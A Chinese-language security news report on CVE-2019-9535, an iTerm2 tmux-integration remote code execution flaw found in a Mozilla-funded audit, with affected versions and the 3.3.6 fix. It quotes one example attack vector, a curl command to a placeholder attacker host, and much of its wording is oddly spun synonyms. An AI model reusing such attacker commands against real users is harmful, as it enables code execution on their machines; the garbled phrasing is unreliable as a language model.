Mac终端利器 iTerm2被曝严重的RCE漏洞，至少已存在7年（含PoC视频）

由Mozilla开源支撑规划(MOSS)帮助、收集平安公司Radically Open Security(ROS)开展的一次自力平安审计究竟显露，iTerm 2 中存在一个严重的长途代码执行(RCE)破绽，且至少已存在7年。 [原创文章：www.ii77.com]

iTerm 2 简介

iTerm2是全球最热点的终端模拟器之一，是斥地人员经常使用的MacOS 终端对象，是Mac内置终端app最有力的热点开源对象替代品之一，被好多斥地人员称为“Mac 终端利器”。

[转载出处：www.ii77.com]

MOSS 规划选择iTerm2进行平安审计的原因在于它处理不受信任的数据且其使用局限普遍，用户包罗高风险方针如斥地人员和系统治理员。

破绽概述

该破绽的CVE编号是CVE-2019-9535。

在审计过程中，ROS在iTerm2的tmux集成功能中找到了一个至少已存在7年之久的严重破绽。冲击者如能生成终端输出，则在好多情形下可以在用户较量机上执行号令。这种冲击向量的例子是保持到由冲击者掌握的 SSH 办事器或许号令如curl http://attacker.com and tail -f /var/log/apache2/referer_log。

斥地人员George Nachman指出，“审计发现某个问题在收到必然的输入后会导致iTerm2发出号令。这个问题非常严重，因为在某些情形下，当用户查察文件或许领受在iTerm2组织的输入时，冲击者就可以在用户机械上执行代码。”

Nachman认为该破绽影响的iTerm2用户数量介于10万至20万之间。

Mozilla公司的平安工程师Tom Ritter指出，这个破绽源自iTerm2中的 tmux集成功能。Tumx应用法式是一款终端多路复用器，可许可从单个设备建立并掌握多个终端。

CERT协调中心发布破绽通知透露，可经由使用号令行对象在终端屏幕上打印由冲击者掌握的内容，从而行使该破绽。该中心指出，“潜在的冲击向量包罗经由ssh保持至恶意办事器，经由curl 获取恶意网站，或许经由tail –f跟踪包含某些恶意内容的日志文件。”

如下是模拟受害者机械保持到恶意SSH办事器之后，在机械上执行号令的 PoC视频。在这个案例中，只打开一个较量器作为另外更具恶意的号令的占位符。

一样情形下，该破绽需要某些用户交互或手法才能遭触发，但因为它可经由平日被认为是平安的号令行使，是以它的潜在影响力伟大。

影响版本

该破绽影响于本周早些时候发布的 3.3.5 版本及之前版本。

修复方案

今朝补丁已发布但主动更新尚未推送，建议用户立刻在iTerm2目录中选择“搜检新版本”手动更新至最新版本3.3.6。

*参考起原：Mozilla、TheRegister，由代码卫士编译，转载请注明来自FreeBuf.COM

出色介绍